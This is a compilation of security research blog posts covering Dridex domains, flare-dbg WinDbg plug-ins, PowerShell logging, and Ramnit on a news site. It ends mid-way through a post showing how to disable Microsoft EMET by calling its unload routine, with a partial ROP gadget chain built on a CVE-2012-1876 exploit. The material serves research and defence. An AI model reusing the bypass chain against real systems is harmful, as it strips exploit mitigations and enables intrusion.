·      vinagps.net
·      www.cityofdavidchurch.org
·      www.hartrijders.com

Conclusion

The Dridex operators may have taken a break after Christmas, but soon after the New Year they ramped up their activities and resumed their operations as usual. It is important for organizations to remain vigilant with user education, proactive detection technologies and security policies that help prevent cybersecurity threats.

Acknowledgements

Thanks to Joonho Sa for contributing to this research.


FLARE Script Series: flare-dbg Plug-ins


Introduction

This post continues the FireEye Labs Advanced Reverse Engineering (FLARE) script series. In this post, we continue to discuss the flare-dbg project. If you haven’t read my first post on using flare-dbg to automate string decoding, be sure to check it out!

We created the flare-dbg Python project to support the creation of plug-ins for WinDbg. When we harness the power of WinDbg during malware analysis, we gain insight into runtime behavior of executables. flare-dbg makes this process particularly easy. This blog post discusses WinDbg plug-ins that were inspired by features from other debuggers and analysis tools. The plug-ins focus on collecting runtime information and interacting with malware during execution. Today, we are introducing three flare-dbg plug-ins, which are summarized in Table 1.

Table 1: flare-dbg plug-in summary

To demonstrate the functionality of these plug-ins, this post uses a banking trojan (MD5: 03BA3D3CEAE5F11817974C7E4BE05BDE) known to FireEye as TINBA.

injectfind

Background

A common technique used by malware is code injection. When malware allocates memory regions to inject code into, the created regions exhibit certain characteristics we can use to identify them in a process’s memory space. The injectfind plug-in finds and displays information about injected memory regions from within WinDbg.
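The characteristics in question can be expressed as a simple predicate over each region's state, type, and protection. The following is a simplified sketch of the malfind-style heuristic using the documented Windows memory constants; the real plug-in queries these values through WinDbg rather than receiving them as plain integers:

```python
# Windows memory constants (see MEMORY_BASIC_INFORMATION in the Win32 docs).
MEM_COMMIT = 0x1000
MEM_PRIVATE = 0x20000              # not backed by a module or file on disk
PAGE_EXECUTE_READWRITE = 0x40

def is_suspicious_region(state, region_type, protect):
    """Flag committed, private memory that is both writable and executable,
    the classic footprint of injected code. Simplified heuristic only."""
    return (state == MEM_COMMIT
            and region_type == MEM_PRIVATE
            and protect == PAGE_EXECUTE_READWRITE)
```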

The injectfind plug-in is loosely based on the Volatility malfind plug-in. Given a memory dump, the Volatility variant searches memory for injected code and shows the analyst any injected code found within processes. Instead of requiring a memory dump, the injectfind WinDbg plug-in runs in a live debugger session. Similar to malfind, injectfind identifies memory regions that may contain injected code and prints a hex dump and a disassembly listing of each identified region. A quick glance at the output helps us identify injected code or hooked functions. The following section shows an example of identifying injected code with injectfind.

Example

After running the TINBA malware in an analysis environment, we observe that the initial loader process exits immediately, and the explorer.exe process begins making network requests to seemingly random domains. After attaching to the explorer.exe process with WinDbg and running the injectfind plug-in, we see the output shown in Figure 1.

Figure 1: Output from the injectfind plug-in

The first memory region at virtual address 0x1700000 appears to contain references to Windows library functions and is 0x17000 bytes in size. It is likely that this memory region contains the primary payload of the TINBA malware.

The second memory region at virtual address 0x1CD0000 contains a single page, 0x1000 bytes in length, and appears to have two lines of meaningful disassembly. The disassembly shows the eax register being set to 0x30 and a jump five bytes into the NtCreateProcessEx function. Figure 2 shows the disassembly of the first few instructions of the NtCreateProcessEx function.

Figure 2: NtCreateProcessEx disassembly listing

The first instruction of NtCreateProcessEx is a jmp to an address outside of ntdll's memory. The destination address lies within the first memory region that injectfind identified as injected code. We can quickly conclude, entirely from within a WinDbg session, that the malware hooks process creation.

membreak

Background

One feature present in OllyDbg and x64dbg but missing from WinDbg is the ability to set a breakpoint on an entire memory region. This type of breakpoint is known as a memory breakpoint. Memory breakpoints are used to pause a process when a specified region of memory is executed.

Memory breakpoints are useful when you want to break on code execution without specifying a single address. For example, many packers unpack their code into a new memory region and begin executing somewhere in this new memory. Setting a memory breakpoint on the new memory region would pause the debugger at the first execution anywhere within the new memory region. This obviates the need to tediously reverse engineer the unpacking stub to identify the original entry point.

One way to implement memory breakpoints is by changing the memory protection for a memory region by adding the PAGE_GUARD memory protection flag. When this memory region is executed, a STATUS_GUARD_PAGE_VIOLATION exception occurs. The debugger handles the exception and returns control to the user. The flare-dbg plug-in membreak uses this technique to implement memory breakpoints.
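The protection-flag arithmetic behind this technique is simple. A sketch using the documented Windows constant values follows; membreak itself applies these protections through the debugger rather than pure Python:

```python
# PAGE_GUARD-based memory breakpoints: OR the guard flag into the region's
# protection to arm, clear it to disarm (sketch of what membreak does via
# the debugger's memory-protection APIs).
PAGE_GUARD = 0x100

def arm(protect: int) -> int:
    """Add PAGE_GUARD: the next access raises STATUS_GUARD_PAGE_VIOLATION."""
    return protect | PAGE_GUARD

def disarm(protect: int) -> int:
    """Restore the original protection once the breakpoint has fired.
    (Windows also clears the guard flag automatically after one violation,
    which is why the plug-in must re-arm it to break again.)"""
    return protect & ~PAGE_GUARD
```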

Example

After locating the injected code using the injectfind plug-in, we set a memory breakpoint to pause execution within the injected code memory region. The membreak plug-in accepts one or multiple addresses as parameters. The plug-in takes each address, finds the base address for the corresponding memory region, and changes the entire region’s permissions. As shown in Figure 3, when the membreak plug-in is run with the base address of the injected code as the parameter, the debugger immediately begins running until one of these memory regions is executed.

Figure 3: membreak plug-in run in WinDbg

The output for the memory breakpoint hit shows a Guard page violation and a message about first chance exceptions. As explained above, this should be expected. Once the breakpoint is hit, the membreak plug-in restores the original page permissions and returns control to the analyst.

importfind

Background

Malware often loads Windows library functions at runtime and stores the resolved addresses as global variables. Sometimes it is trivial to resolve these statically in IDA Pro, but other times this can be a tedious process. To speed up the labeling of these runtime imported functions, we created a plug-in named importfind to find these function addresses. Behind the scenes, the plug-in parses each library's export table and finds all exported function addresses. The plug-in then searches the malware’s memory and identifies references to the library function addresses. Finally, it generates an IDAPython script that can be used to annotate an IDB workspace with the resolved library function names.
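The address-scanning step can be sketched as follows. This is a simplified stand-in for importfind: the export map is assumed to be pre-built by parsing each module's export table, and the emitted idc.set_name lines are one way to perform the renaming in IDAPython:

```python
import struct

def find_runtime_imports(memory: bytes, base: int, exports: dict):
    """Scan a memory blob for 32-bit pointers into known export addresses
    and emit IDAPython rename lines (simplified stand-in for importfind).
    'exports' maps resolved API addresses to names, normally harvested by
    walking each loaded module's export table."""
    script_lines = []
    for offset in range(0, len(memory) - 3, 4):
        value = struct.unpack_from("<I", memory, offset)[0]
        if value in exports:
            va = base + offset   # virtual address of the global variable
            script_lines.append(
                'idc.set_name(0x%X, "%s")' % (va, exports[value]))
    return script_lines
```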

Example

Going back to TINBA, we saw text referencing Windows library functions in the output from injectfind above. The screenshot of IDA Pro in Figure 4 shows this same region of data. Note that following each ASCII string containing an API name there is a number that looks like a pointer. Unfortunately, IDA Pro does not have the same insight as the debugger, so these addresses are not resolved to API functions and named.

Figure 4: Unnamed library function addresses

We use the importfind plug-in to find the function names associated with these addresses, as shown in Figure 5.

Figure 5: importfind plug-in run in WinDbg

The importfind plug-in generates an IDAPython script file that renames these global variables in our IDB. Figure 6 shows a screenshot from IDA Pro after the script has renamed the global variables to more meaningful names.

Figure 6: IDA Pro with named global variables

Conclusion

This blog post shows the power of using the flare-dbg plug-ins with a debugger to gain insight into how the malware operates at runtime. We saw how to identify injected code using the injectfind plug-in and create memory breakpoints using membreak. We also demonstrated the usefulness of the importfind plug-in for identifying and renaming runtime imported functions.

To find out how to set up and get started with flare-dbg, head over to the GitHub project page, where you’ll learn about setup and usage.

Greater Visibility Through PowerShell Logging


Introduction

Mandiant is continuously investigating attacks that leverage PowerShell throughout all phases of the attack. A common issue we experience is a lack of available logging that adequately shows what actions the attacker performed using PowerShell. In those investigations, Mandiant routinely offers guidance on increasing PowerShell logging to provide investigators a detection mechanism for malicious activity and a historical record of how PowerShell was used on systems. This blog post details various PowerShell logging options and how they can help you obtain the visibility needed to better respond, investigate, and remediate attacks involving PowerShell.  

Background

Attackers and developers of penetration-testing frameworks are increasingly leveraging Windows PowerShell to conduct their operations. PowerShell is an extremely powerful command environment and scripting language that is built in to Microsoft Windows. By default, PowerShell does not leave many artifacts of its execution in most Windows environments. The combination of impressive functionality and stealth has made attacks leveraging PowerShell a nightmare for enterprise security teams[1].

PowerShell 2.0, which comes installed on all Windows 7/2008 systems, provides very little evidence of attacker activity. The Windows event logs show that PowerShell executed, the start and end times of sessions, and whether the session executed locally or remotely (ConsoleHost or ServerRemoteHost). However, they reveal nothing about what was executed with PowerShell. Figure 1 shows an example of the event log messages recorded in the PowerShell 2.0 log Windows PowerShell.evtx.

Figure 1: PowerShell Session Start in PowerShell 2.0

Microsoft has been taking steps to improve the security transparency of PowerShell in recent versions. The most significant improvements, such as enhanced logging, were released in PowerShell version 5.0. This enhanced logging records executed PowerShell commands and scripts, de-obfuscated code, output, and transcripts of attacker activity. Enhanced PowerShell logging is an invaluable resource, both for enterprise monitoring and incident response.

The current General Availability release of PowerShell for pre-Windows 10 systems is version 4.0, due to a recall of version 5.0. However, Microsoft back-ported several useful security features from version 5.0 to 4.0 in a series of optional updates. This post will address using the updated PowerShell version 4.0 for pre-Windows 10 systems; however, once it is available, Mandiant recommends using PowerShell version 5.0.

Installation

Windows 10 does not require any software updates to support enhanced PowerShell logging.

For Windows 7/8.1/2008/2012, updating PowerShell to enable enhanced logging requires:

»      .NET 4.5
»      Windows Management Framework (WMF) 4.0
»      The appropriate WMF 4.0 update
        -     8.1/2012 R2 – KB3000850
        -     2012 – KB3119938
        -     7/2008 R2 SP1 – KB3109118

Downloading these updates from Microsoft may require the completion of an automated request process.

Logging Configuration

Logging must be configured through Group Policy as follows:

Administrative Templates → Windows Components → Windows PowerShell

Figure 2: PowerShell configuration options

PowerShell supports three types of logging: module logging, script block logging, and transcription. PowerShell events are written to the PowerShell operational log Microsoft-Windows-PowerShell%4Operational.evtx.

Module Logging

Module logging records pipeline execution details as PowerShell executes, including variable initialization and command invocations. Module logging will record portions of scripts, some de-obfuscated code, and some data formatted for output. This logging will capture some details missed by other PowerShell logging sources, though it may not reliably capture the commands executed. Module logging has been available since PowerShell 3.0. Module logging events are written to Event ID (EID) 4103.

While module logging generates a large volume of events (the execution of the popular Invoke-Mimikatz script generated 2,285 events resulting in 7 MB of logs during testing), these events record valuable output not captured in other sources.

To enable module logging:

1.     In the “Windows PowerShell” GPO settings, set “Turn on Module Logging” to enabled.
2.     In the “Options” pane, click the “Show” button next to “Module Names”.
3.     In the Module Names window, enter * to record all modules.
    a.     Optional: To log only specific modules, specify them here. (Note: this is not recommended.)
4.     Click “OK” in the “Module Names” Window.
5.     Click “OK” in the “Module Logging” Window.

Alternately, setting the following registry values will have the same effect:

»      HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging → EnableModuleLogging = 1
»      HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames → * = *

Script Block Logging

Script block logging records blocks of code as they are executed by the PowerShell engine, thereby capturing the full contents of code executed by an attacker, including scripts and commands. Due to the nature of script block logging, it also records de-obfuscated code as it is executed. For example, in addition to recording the original obfuscated code, script block logging records the decoded commands passed with PowerShell’s -EncodedCommand argument, as well as those obfuscated with XOR, Base64, ROT13, encryption, and so on. Script block logging does not record output from the executed code. Script block logging events are recorded in EID 4104.
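Because -EncodedCommand is simply Base64 over the UTF-16LE bytes of the command text, analysts can decode such blobs directly when reviewing these logs, for example:

```python
import base64

def decode_encoded_command(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand argument: Base64 over the
    UTF-16LE bytes of the command text."""
    return base64.b64decode(b64).decode("utf-16-le")

# Encoding side, for reference; this is what produces the blob passed as
#   powershell.exe -EncodedCommand <blob>
def encode_command(cmd: str) -> str:
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")
```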

While not available in PowerShell 4.0, PowerShell 5.0 automatically logs code blocks whose contents match a list of suspicious commands or scripting techniques, even if script block logging is not enabled. These suspicious blocks are logged at the “warning” level in EID 4104, unless script block logging is explicitly disabled. This feature ensures that some forensic data is logged for known-suspicious activity even if logging is not enabled, but it is not considered a security feature by Microsoft. Enabling script block logging will capture all activity, not just blocks the PowerShell process considers suspicious, allowing investigators to identify the full scope of attacker activity. Blocks not considered suspicious are also logged to EID 4104, but at the “verbose” or “information” levels.

Script block logging generates fewer events than module logging (Invoke-Mimikatz generated 116 events totaling 5 MB) and records valuable indicators for alerting in a SIEM or log monitoring platform.

Group Policy also offers an option to “Log script block execution start / stop events”. This option records the start and stop of script blocks, by script block ID, in EIDs 4105 and 4106. This option may provide additional forensic information, as in the case of a PowerShell script executing over a long period, but it generates a prohibitively large number of events (96,458 events totaling 50 MB per execution of Invoke-Mimikatz) and is not recommended for most environments.

To enable script block logging:

1.     In the “Windows PowerShell” GPO settings, set “Turn on PowerShell Script Block Logging” to enabled.

Alternately, setting the following registry value will enable logging:

»      HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging → EnableScriptBlockLogging = 1

Transcription

Transcription creates a unique record of every PowerShell session, including all input and output, exactly as it appears in the session. Transcripts are written to text files, broken out by user and session. Transcripts also contain timestamps and metadata for each command in order to aid analysis. However, transcription records only what appears in the PowerShell terminal, which will not include the contents of executed scripts or output written to other destinations such as the file system.

PowerShell transcripts are automatically named to prevent collisions, with names beginning with “PowerShell_transcript”. By default, transcripts are written to the user’s documents folder, but can be configured to any accessible location on the local system or on the network. The best practice is to write transcripts to a remote, write-only network share, where defenders can easily review the data and attackers cannot easily delete them (see reference 2 below). Transcripts are very storage-efficient (less than 6 KB per execution of Invoke-Mimikatz), easily compressed, and can be reviewed using standard tools like grep.

To enable transcription:

1.     In the “Windows PowerShell” GPO settings, set “Turn on PowerShell Transcription” to enabled.
2.     Check the “Include invocation headers” box, in order to record a timestamp for each command executed.
3.     Optionally, set a centralized transcript output directory.

This directory should be a write-only, restricted network share that security personnel can access. If no output directory is specified, the transcript files will be created under the user’s documents directory.

Alternately, setting the following registry values will enable logging:

»      HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\Transcription → EnableTranscription = 1
»      HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\Transcription → EnableInvocationHeader = 1
»      HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\Transcription → OutputDirectory = “” (Enter path. Empty = default)

Log Settings

Where possible, Mandiant recommends enabling all three log sources: module logging, script block logging and transcription. Each of these sources records unique data valuable to analyzing PowerShell activity. In environments where log sizes cannot be significantly increased, enabling script block logging and transcription will record most activity, while minimizing the amount of log data generated. At a minimum, script block logging should be enabled, in order to identify attacker commands and code execution.

Ideally, the size of the PowerShell event log Microsoft-Windows-PowerShell%4Operational.evtx should be increased to 1 GB (or as large as your organization will allow) in order to ensure that data is preserved for a reasonable period. PowerShell logging generates large volumes of data that quickly rolls the log (up to 1 MB per minute has been observed during typical admin or attacker activity).

The Windows Remote Management (WinRM) log, Microsoft-Windows-WinRM%4Operational.evtx, records inbound and outbound WinRM connections, including PowerShell remoting connections. The log captures the source (inbound connections) or destination (outbound connections), along with the username used to authenticate. This connection data can be valuable in tracking lateral movement using PowerShell remoting. Ideally, the WinRM log should be set to a sufficient size to store at least one year of data.

Due to the large number of events generated by PowerShell logging, organizations should carefully consider which events to forward to a log aggregator. In environments with PowerShell 5.0, organizations should consider, at a minimum, aggregating and monitoring suspicious script block logging events, EID 4104 with level “warning”, in a SIEM or other log monitoring tool. These events provide the best opportunity to identify evidence of compromise while maintaining a minimal dataset.

Appendices

References

  1. http://blogs.msdn.com/b/powershell/archive/2016/01/19/windows-management-framework-wmf-4-0-update-now-available-for-windows-server-2012-windows-server-2008-r2-sp1-and-windows-7-sp1.aspx
  2. http://blogs.msdn.com/b/powershell/archive/2015/06/09/powershell-the-blue-team.aspx
  3. https://www.fireeye.com/content/dam/fireeye-www/global/en/solutions/pdfs/wp-lazanciyan-investigating-powershell-attacks.pdf

Special thanks to Lee Holmes and the Microsoft PowerShell team.

[1] See the Shmoocon 2016 presentation “No Easy Breach” by Mandiant consultants Matthew Dunwoody and Nick Carr for some additional context of our experience analyzing PowerShell attacks: https://archive.org/details/No_Easy_Breach.

Maimed Ramnit Still Lurking in the Shadow


Newspapers have the ability to do more than simply keep us current with worldly affairs; we can use them to squash bugs! Yet, as we move from waiting on the newspaper delivery boy to reading breaking news on ePapers, we lose the subtle art of bug squashing. Instead, we end up exposing ourselves to dangerous digital bugs that can affect our virtual worlds.

This is exactly what happened to visitors of one of the top five news sites in China. Any user running Internet Explorer (IE) who navigated to the website may have been exposed to an old yet persistent VBScript worm that self-replicates recursively from infected machines. Incidentally, the major actors behind this old campaign have been taken down, yet traces of their injected, self-replicating malware have still managed to sneak onto one of the most browsed sites in China.

FireEye Dynamic Threat Intelligence (DTI) first discovered that the site was compromised and used to host VBS/Ramnit on Jan. 28, 2016, and we can confirm that the infection is still live as of this writing. IE users who visit the site may be compromised if they browse to a specific page (paperindex[.]htm) and click ‘Yes’ to run ActiveX, which may appear safe since the website is familiar and popular. No exploit is used for infection, only social engineering and errant clicks.

As shown in Figure 1, a malicious VBScript is appended after the HTML body. Upon landing on this page, the victim’s browser loads the news content while executing a malicious ActiveX component in the background.

Figure 1: Legitimate HTML page appended with malicious VBScript
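A quick triage check for this infection marker, script content appended after the document's closing tag, can be written in a few lines. This is an illustration for scanning suspect HTML files, not FireEye's detection logic:

```python
import re

# Illustrative triage check: Ramnit appends its VBScript after the closing
# </body> or </html> tag of HTML files it can reach, so script content
# after the document's closing tag is a red flag.
APPENDED_SCRIPT_RE = re.compile(
    r"</(?:body|html)>\s*<script\b[^>]*>", re.IGNORECASE)

def has_appended_script(html: str) -> bool:
    """Return True if a script tag appears after a closing body/html tag."""
    return bool(APPENDED_SCRIPT_RE.search(html))
```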

As shown in Figure 2 and Figure 3, the VBScript drops a binary named “svchost.exe” in the %TEMP% folder and executes it upon successful ActiveX execution. Once the system is compromised, the malware also tries to connect to a CnC server, fget-career[.]com, which has been involved in previous campaigns for this trojan.

Figure 2: The VBScript drops the binary in the %TEMP% folder and executes it

Figure 3: The full path to “svchost.exe” (using Internet Explorer 11 on Windows 7)

Successful execution of the VBScript and delivery of W32.Ramnit onto the victim's machine depend on the user's browser, as well as the browser's settings. Since Chrome and Firefox do not support client-side VBScript, only IE users are susceptible to this attack.

Fortunately, recent versions of IE do not run code automatically by default. Instead, users will see two popup warnings when the browser is rendering potentially dangerous objects such as ActiveX components, as shown in Figure 4 and Figure 5.

Figure 4: First warning for blocked content in IE 11

Figure 5: Second warning for blocked content in IE 11

Only when the victim clicks "Yes" will the browser execute the blocked content. In this case, IE executes the VBScript, drops the payload, and runs it in the background while the user simply sees the usual news page.

As long as users click “No” to disallow ActiveX components, they will remain safe from W32.Ramnit. However, this type of social engineering continues to be successful. When a legitimate site is compromised to host exploits or malware, the positive reputation of the site is leveraged to trick users into clicking “Yes” and becoming infected. The potential impact of this particular threat is compounded by the fact that the compromised site is ranked in the Alexa Top 100 for most visited sites internationally, and is in the Top 25 for most popular websites in China [1].

FireEye appliances detect this infection at multiple levels. FireEye’s multiflow detection traces out the complete attack chain, as well as CnC communication. While the CnC host has been suspended for a long time, the worm’s presence alone can be a pain for the victim because it adds itself into all HTML files that it can access. Additionally, it adds itself to the startup registry and impacts the machine’s performance.
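Because the worm appends its VBScript after the closing HTML tags of every file it can reach, infected pages carry a telltale trailer. The following is a hedged detection sketch in Python (a crude heuristic of ours for illustration, not FireEye's detection logic): flag HTML whose content continues with a script block after `</html>`.

```python
import re

def looks_appended(html: str) -> bool:
    """Flag HTML whose content continues with a <script> block after the
    closing </html> tag, the file-infection pattern described above."""
    m = re.search(r"</html\s*>", html, re.IGNORECASE)
    if not m:
        return False
    trailer = html[m.end():]
    return bool(re.search(r"<script\b", trailer, re.IGNORECASE))

clean = "<html><body>news content</body></html>"
infected = clean + '<script language="VBScript">\' dropper here</script>'
print(looks_appended(clean), looks_appended(infected))  # False True
```

A scanner built on this would walk a web root and report any file where `looks_appended` returns True; legitimate trailing analytics snippets would need to be whitelisted.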

So the question that you need to ask yourself is this: If a Top 100 Alexa domain is still infected by this veteran malware, are you?

Using EMET to Disable EMET


Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) is a project that adds security mitigations to user mode programs beyond those built in to the operating system. It runs inside “protected” programs as a Dynamic Link Library (DLL), and makes various changes in order to make exploitation more difficult.

EMET bypasses have been seen in research and past attacks [2, 3, 4, 5, 6, 7, 8]. Generally, Microsoft responds by changing or adding mitigations to defeat any existing bypasses. EMET was designed to raise the cost of exploit development and not as a “fool proof exploit mitigation solution” [1]. Consequently, it is no surprise that attackers who have read/write capabilities within the process space of a protected program can bypass EMET by systematically defeating each mitigation [2].

If an attacker can bypass EMET with significantly less work, then it defeats EMET’s purpose of increasing the cost of exploit development. We present such a technique in the section New Technique to Disable EMET. Microsoft has issued a patch to address this issue in EMET 5.5.

After discussing this new technique, we describe previously documented techniques used to either bypass or disable EMET. Please refer to the appendix if you’d like to know more about what kind of protections are implemented by EMET.

New Technique to Disable EMET

EMET injects emet.dll or emet64.dll (depending on the architecture) into every protected process, where it installs hooks on Windows APIs (functions exported by DLLs such as kernel32.dll, ntdll.dll, and kernelbase.dll). These hooks give EMET the ability to analyze any call into a critical API and determine whether it is legitimate. If the call is deemed legitimate, EMET's hooking code jumps back into the requested API; otherwise, it triggers an exception.
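This hook-and-fall-through scheme can be illustrated with a pure-Python toy model (all names here are invented for illustration; real EMET detours patch the API's machine-code prologue, not a dispatch table): a "critical API" is wrapped by a check that either raises or falls through to the saved original.

```python
# Toy model of the detour scheme described above.
API_TABLE = {"VirtualAlloc": lambda size: f"alloc({size})"}
saved_originals = {}

def install_hook(api_name, check):
    original = API_TABLE[api_name]
    saved_originals[api_name] = original        # analogue of the saved prologue
    def hooked(*args, caller="unknown"):
        if not check(caller):                   # inspect the call's legitimacy
            raise RuntimeError(f"blocked {api_name} call from {caller}")
        return original(*args)                  # "jump back" into the real API
    API_TABLE[api_name] = hooked

def remove_all_hooks():
    # The unload routine the article describes: restore every saved original,
    # leaving the process with no checks at all.
    for name, original in saved_originals.items():
        API_TABLE[name] = original
    saved_originals.clear()

install_hook("VirtualAlloc", check=lambda caller: caller != "rop-gadget")
```

While the hook is installed, a call attributed to "rop-gadget" raises; after `remove_all_hooks()`, the same call goes straight to the original with no inspection, which is exactly why a reachable unload routine is so valuable to an attacker.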

However, there exists a portion of code within EMET that is responsible for unloading EMET. The code systematically disables EMET’s protections and returns the program to its previously unprotected state. One simply needs to locate and call this function to completely disable EMET. In EMET.dll v5.2.0.1, this function is located at offset 0x65813. Jumping to this function results in subsequent calls, which remove EMET’s installed hooks.

This feature exists because emet.dll contains code for cleanly exiting from a process. Conveniently, it is reachable from DllMain.

Prototype of DllMain :
BOOL WINAPI DllMain(
  _In_ HINSTANCE hinstDLL,
  _In_ DWORD     fdwReason,
  _In_ LPVOID    lpvReserved
);

Note that the first parameter provides the base address of the DLL. The second is how the PE loader communicates whether the DLL is being loaded (1) or unloaded (0). If fdwReason is 1, the DLL knows it is being loaded and initializes. If fdwReason is 0 (DLL_PROCESS_DETACH), emet.dll runs its unloading code: assuming it is being unloaded, it goes through its exit routine and removes its hooks and exception handlers, thereby removing EMET's checks. Note that this does not remove EMET from memory; it just ensures all of its protections are disabled.

This kind of feature could exist in any detection-oriented product that relies on user-space hooks: to ensure the product does not break the process on unload, there has to be an unloading routine that removes all protection checks. EMET's DllMain can be reached through the small Return Oriented Programming (ROP) gadget chain shown in the next section, which simply jumps to DllMain with the right parameters to unload EMET's protection checks.

BOOL WINAPI DllMain (GetModuleHandleW("EMET.dll") , DLL_PROCESS_DETACH , NULL);

The GetModuleHandleW function is not hooked by EMET, since it is not considered a critical Windows API. We use this function to retrieve the base address of emet.dll. Because the PE header can be located from the base address, we use it to find the address of DllMain and call it with the required parameters.
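The header arithmetic involved (the same walk the ROP chain performs later in this post) can be sketched in a few lines of Python. This is an illustration over a synthetic header buffer, not code that touches a live process; the offsets 0x3C and 0x28 come from the PE format, while the sample values are made up.

```python
import struct

def entry_point_va(image: bytes, base: int) -> int:
    """base + [base+0x3c] locates the PE header; the DWORD at PE+0x28 is
    AddressOfEntryPoint (an RVA), which for a DLL dispatches to DllMain."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]              # IMAGE_DOS_HEADER::e_lfanew
    entry_rva = struct.unpack_from("<I", image, e_lfanew + 0x28)[0]  # AddressOfEntryPoint
    return base + entry_rva

# Synthetic header: e_lfanew = 0x80, AddressOfEntryPoint RVA = 0x1234
hdr = bytearray(0x200)
struct.pack_into("<I", hdr, 0x3C, 0x80)
struct.pack_into("<I", hdr, 0x80 + 0x28, 0x1234)
print(hex(entry_point_va(bytes(hdr), 0x10000000)))  # 0x10001234
```

The ROP chain in the next section performs exactly these two dereferences and one addition, only with x86 gadgets instead of `struct.unpack_from`.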

Disabling EMET - Details

In EMET.dll v5.2.0.1, there is a global variable at offset 0xF2958 of emet.dll. EMET uses this variable as a pointer to an array of structures to track the detoured APIs, and each structure has size 0x18 bytes, as shown below:

struct Detoured_API {
    BOOL  isActive;                  // hooking status; active: 0x1
    PVOID DetouredAPIConfig;         // pointer to a Detoured_API_Config structure
    PVOID nextDetouredAPI;           // pointer to the next Detoured_API structure
    DWORD valueX;
    DWORD valueY;
    DWORD valueZ;
};

The last three variables are not relevant to this article’s analysis. DetouredAPIConfig holds a pointer value to another structure we named Detoured_API_Config, with size 0x18 bytes.

struct Detoured_API_Config {
    PVOID DetouredWindowsAPI;        // pointer to the detoured Windows API
    PVOID EMETDetouringFunction;     // pointer to where the EMET protection is implemented
    PVOID DetouredFunctionPrologue;  // pointer to the Windows API prologue
    DWORD valueX;
    DWORD valueY;
    DWORD valueZ;
};

Note that between EMETDetouringFunction and DetouredFunctionPrologue there are always 0x26 bytes, in which EMET prepares the required parameters for the protection function (where the caller code gets inspected) and then calls the protection function to perform the check. In these same 0x26 bytes, EMET stores other metadata, such as the size of the detoured function prologue. The third field in the Detoured_API_Config structure is DetouredFunctionPrologue; jumping to that address results in calling the unhooked Windows API, since after executing the saved function prologue it jumps back to execute the rest of the Windows API function.

The function behind removing EMET hooks is located at offset 0x27298, which is shown in Figure 1.

Figure 1: Function at offset 0x27298 responsible for removing EMET hooks

To unload, the function at offset 0x27298 loops through all Detoured_API structures and zeroes out DetouredFunctionPrologue in each associated Detoured_API_Config structure. It then calls Patch_Functions (the function at offset 0x27B99), which is responsible for patching all of the detoured Windows APIs: it uses memcpy (as shown in Figure 2) to copy the original API function prologue back over the detoured function, restoring it to its state before detouring.
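The loop can be modeled roughly as follows. This is a hypothetical Python rendering of the reconstructed structures (field names follow the article; the byte values and simplified behavior are invented for illustration):

```python
class DetouredAPIConfig:
    def __init__(self, api_bytes, saved_prologue):
        self.DetouredWindowsAPI = api_bytes             # hooked function body (mutable)
        self.DetouredFunctionPrologue = saved_prologue  # original prologue bytes

class DetouredAPI:
    def __init__(self, config, next_node=None):
        self.isActive = True
        self.DetouredAPIConfig = config
        self.nextDetouredAPI = next_node

def patch_functions(head):
    """Walk the singly linked Detoured_API list and copy each saved
    prologue back over the detour jump, un-hooking every API."""
    node = head
    while node is not None:
        cfg = node.DetouredAPIConfig
        saved = cfg.DetouredFunctionPrologue
        cfg.DetouredWindowsAPI[:len(saved)] = saved   # the memcpy in Figure 2
        node.isActive = False
        node = node.nextDetouredAPI

# Two "APIs" whose first bytes were overwritten with a detour jump (0xE9 ...)
api1 = bytearray(b"\xe9\xaa\xaa\xaa\xaa\x90\x90")
api2 = bytearray(b"\xe9\xbb\xbb\xbb\xbb\xc3")
head = DetouredAPI(DetouredAPIConfig(api1, b"\x8b\xff\x55\x8b\xec"),
                   DetouredAPI(DetouredAPIConfig(api2, b"\x6a\x10\x68\x00\x11")))
patch_functions(head)
print(api1[:5] == bytearray(b"\x8b\xff\x55\x8b\xec"))  # True
```

After the walk, every function body begins with its original prologue again, which is what Figures 3 and 4 show at the machine-code level.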


Figure 2: Code that removes detours

After looping through all the detoured APIs and patching them with memcpy, all the detours in the Windows APIs are gone, as shown in Figure 3 and Figure 4 (before and after, respectively).

Figure 3: Before calling DllMain with unloading parameters

Figure 4: After calling DllMain with unloading parameters

EMET then continues on to disable the EAF and EAF+ protections. In the function at offset 0x609D0, EMET zeroes out and reinitializes a CONTEXT structure and manipulates the debug registers (as shown in Figure 5). At the end of the function, EMET calls NtSetContextThread, which zeroes out the debug registers and hence disables the EAF and EAF+ protections.


Figure 5: EAF & EAF+ disabling code

Finally, at the end of the function at offset 0x60FBF, EMET calls the function located at offset 0x60810 that calls RemoveVectoredExceptionHandler to remove the defined vectored exception handler, which has been added using AddVectoredExceptionHandler.

Disabling EMET – ROP Implementation

Using an old and patched vulnerability, CVE-2012-1876, we built ROP gadgets on top of an already existing exploit, and executed it with EMET protections enabled. After our ROP gadgets called the DllMain function of EMET.dll with the parameters (EMET.dll base address, 0, 0), we resumed execution, and all the detours placed in the hooked Windows APIs were gone, along with the EAF and EAF+ protections.

XCHG EAX,ESP # RETN           // stack pivot; ROP chain starts

POP EAX # RETN                // pop GetModuleHandleW pointer from the IAT

<GetModuleHandleW>            // mshtml.dll base + offset in IAT

JMP [EAX]                     // jump into the GetModuleHandleW pointer

POP EBX # RETN                // return address when EIP = GetModuleHandleW

EMET_STRING_PTR               // argument 1 for GetModuleHandleW, i.e. the "EMET.dll" string

// After GetModuleHandleW returns, ESP is here while EIP = POP EBX # RETN

0x0000003c                    // 0x3c goes into EBX

ADD EBX,EAX # RETN            // EAX = EMET.dll base; EBX = base + 0x3c, the address of IMAGE_DOS_HEADER::e_lfanew

XOR EBP,EBP # RETN            // clear out EBP

ADD EBP,EAX # RETN            // add EAX into the nulled EBP (EBP = EMET_DLL_BASE)

ADD EAX,[EBX] # RETN          // [EBX] = poi(EMET_DLL_BASE+0x3c) => EAX = VA of the PE header

POP EBX # RETN                // pop 0x28 into EBX

0x00000028

